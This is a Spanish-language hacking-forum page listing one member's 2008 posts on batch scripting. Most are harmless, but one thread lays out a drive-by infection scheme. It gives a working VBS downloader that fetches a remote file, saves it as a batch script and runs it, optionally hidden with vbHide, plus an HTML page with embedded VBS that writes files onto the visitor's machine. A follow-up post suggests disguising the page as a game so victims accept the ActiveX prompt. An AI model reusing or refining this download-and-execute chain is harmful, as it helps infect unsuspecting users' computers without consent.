elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 [13] 14 15 16 17 18
121  Programación / Scripting / Re: Malware Removal Tool - by :: SmartGenius :: en: 2 Agosto 2008, 17:02 pm
bueno, pues fue una idea que tuve hace un rato que me encontre con varios virus en unas PCs que trabajaba, y pense que si lo hacia de esa manera no solo me beneficiaba yo, sino aquellos que tambien tuvieran el mismo problema....

lo que pasa es que muchas veces los virus cambian de forma un poco y es posible que se alojen en otras claves del registro, por lo que es posible que de errores...

igual ahi esta el codigo fuente, y alguien con conocimientos en esto debe saber modificarlo para que funcione...

Saludos.
122  Programación / Scripting / Re: Batch lenguaje o no ? la eterna pregunta en: 27 Julio 2008, 00:47 am
Has intentado hacer copy /b con algunos archivos, esa es la base, solo que hay que saber en que orden se juntan los archivos y aho tienes algo bueno...xD no te lo voy a decir todo...

Saludos.
123  Programación / Scripting / Re: Crackme in batch en: 27 Julio 2008, 00:45 am
Me gusto, la pass varia cada ves que lo abres, la primera ves lo hice en 26 intentos, ya la segunda no me salio porque me decia que la pass era menor que 0 ??

Me gustaria saber como hiciste para empaquetarlo de esa manera...

Saludos.
124  Programación / Scripting / Re: Batch lenguaje o no ? la eterna pregunta en: 27 Julio 2008, 00:34 am
Sip, y un joiner en batch tambien lo hay... si existe y lo he visto funcionar, solo que es en el foro de el-pepito.com... :rolleyes:

Saludos.
125  Programación / Scripting / Re: Batch lenguaje o no ? la eterna pregunta en: 22 Julio 2008, 03:17 am
No manches :xD
Código
  1. call:blah 123
  2. goto:EOF
  3. :blah
  4. :: y %1 vale 123.. si quieres hacer algo con su valor puedes seguir recursionando..
  5.  

jajaja... SENSEI... :rolleyes:

Lo dejaste... :o
126  Programación / Scripting / Re: [HTML-VBS-Batch] Propagacion a traves de Internet ? Posible ? en: 22 Julio 2008, 03:14 am
Ok, NovLucer.. muchisimas gracias por tu ayuda, se ve que sabes bastante de VBS.. ;D

Claro que salta el aviso del control active X, pero se puede camuflar la pagina con un juego o algo asi, y bien decoradita, pues seguro que alguie tendra que caer... ;D

Saludos.
127  Programación / Scripting / [HTML-VBS-Batch] Propagacion a traves de Internet ? Posible ? en: 20 Julio 2008, 20:04 pm
Tenemos como base el siguiente codigo...

http://two.xthost.info/smartgenius/codigo.txt

Archivo BAT de Prueba
Código:
mode con cols=60
mode con lines=20
@echo off
title Propagacion a traves de Internet - By :: SmartGenius ::
color 0a

:ini
cls
echo.
echo.
echo  Este es un Archivo de Comandos BATCH descargado
echo  a traves de internet mediante un Script VBS
echo  insertado en una Pagina HTML.
echo.
echo  El Script es capaz de Bajar y Ejecutar Codigo, casi
echo  sin permiso del Usuario...
echo.
echo  Por ahora es Solo una idea, pero espero poder
echo  desarrollarlo completamente...
echo.
echo  Un Saludo... ;)
echo.
pause
exit

El cual puede ser una serie de comandos Batch, ya sea de virus o bromas o cualquier otra cosa, o puede ser tambien cualquier otro archivo...

Ahora tomemos un script VBS que nos descarga y nos ejecuta el archivo...

VBS Downloader
Código:
Set aVar = CreateObject("Microsoft.XMLHTTP")
aVar.Open "GET","http://two.xthost.info/smartgenius/codigo.txt",0
aVar.Send()
Set sDow = CreateObject("ADODB.Stream")
sDow.Mode = 3
sDow.Type = 1
sDow.Open()
sDow.Write(aVar.responseBody)
sDow.SaveToFile "codigo.bat",2
Set codigo = CreateObject("WScript.Shell")
codigo.Run "Codigo.bat"

y por ultimo una pagina HTML con codigo VBS insertado para crear archivos de texto plano en la PC...

Pagina HTML Decorada...xD
Código:
<HTML>
<HEAD><TITLE>.:: SmartGenius - powered by iSmart ::.</TITLE>
</HEAD>
<BODY bgColor=#000000 text="green">
<script language="vbs">
Dim smart, archivo
Set smart = CreateObject("Scripting.FileSystemObject")
set archivo= smart.CreateTextFile("pepito.bat", True)
archivo.WriteLine("@echo off")
archivo.WriteLine("title SmartGenius")
archivo.WriteLine("color 0a")
archivo.WriteLine("echo  Hola")
archivo.WriteLine("echo  Codigo de Prueba")
archivo.WriteLine("pause")
archivo.close
</script>
<center><h1>Propagacion de Code a traves de Internet</h1><br><br>Demostracion de Descarga y Ejecucion de Codigo...by :: SmartGenius ::</center>
</BODY>
</HTML>

Entonces, la pagina HTML crea un archio en la PC, en este caso un Bat que dice prueba y no mas...

La teoria seria que la pagina HTML creara y ejecutara el segundo codigo, el VBS Downloader y este se encarga de descargar y ejecutar el resto...

Pueden guardar el VBS Downloader y ejecutarlo y veran como descarga y ejecuta el otro bat, y seria posible hacerlo de manera oculta agregando al final ,vbHide...

Hasta aqui todo bien, lo unico que no logro hacer es crear el codigo del VBS Downloader a partir de la pagina HTML.... ya que como es un code VBS creando otro VBS es en ese momento donde hay un problema porque hay ciertos caracteres y funciones reservadas, y no logro que el code salga bien...

Es por ahora una teoria, pero espero poder desarrollarla completamente y dar una nueva posibilidad de propagacion a nuestros codes...

Agradeceria un poco de ayuda, de los expertos en VBS...NovLucker ??..

Un Saludo.
128  Programación / Scripting / Re: Batch lenguaje o no ? la eterna pregunta en: 20 Julio 2008, 19:48 pm
Bueno, viendo lo posteado por SDC, me vuelvo a favor de considerarlo un lenguaje, el es un maestro ene sto y si el lo considera asi, pues de igual forma lo hare...

No se necesita mucho de archivos externos para poder trabajar, con algo de imaginacion puedes llegar a hacer muchas cosas...

http://foro.elhacker.net/scripting/batch_funcion_d2b_convierte_decimal_a_binario-t200685.0.html
http://foro.elhacker.net/scripting/batch_funcion_len_devuelve_la_longitud_de_una_cadena-t200681.0.html
http://foro.elhacker.net/scripting/batch_funcion_ohce_invierte_una_cadena-t200683.0.html

y asi podria seguir...

Saludos.
129  Programación / Scripting / Re: Batch lenguaje o no ? la eterna pregunta en: 19 Julio 2008, 19:42 pm
Yo en este tema estaria neutral, se que el batch tiene limitaciones que podrian llegar a catalogarlo como otra cosa, pero de igual forma tiene sintaxis y funciones como un lenguaje normal...asi sea de scripting...

Saludos.
130  Programación / Scripting / Re: No salir del cmd despues de ejecutar un bath???? en: 19 Julio 2008, 19:06 pm
si no quieres que se salga, y te de consola para ejecutar comandos haz lo que te han dicho arriba..

usalo de la siguiente forma

pause & cmd

y al final te pedira que presiones una tecla, para que luego puedas usar la ocnsola normalmente y enviar comandos...

Saludos.
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 [13] 14 15 16 17 18
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines